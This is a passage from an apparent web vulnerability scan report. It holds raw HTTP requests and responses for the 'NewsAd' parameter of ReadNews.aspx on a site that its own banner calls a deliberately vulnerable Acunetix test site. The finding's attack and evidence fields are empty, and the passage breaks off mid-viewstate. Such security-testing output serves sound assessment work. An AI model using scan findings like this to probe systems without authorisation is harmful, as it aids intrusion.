YmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLEirm5BAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGR35lZNwQ8OqxiqiZO%2FZZOlJz58
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 18076
Response Body - size: 18,076 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGSaJVtdRqrIb4g8/ZtiayAG6OnQCA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLyytPMBgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMJd1ucUfNI8x3o4I+C+TrBHqvCj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3
Method	POST
Parameter	NewsAd
Attack
Evidence
Show / hide Request and Response
Request Header - size: 463 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 Content-Length: 3721 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 3,721 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW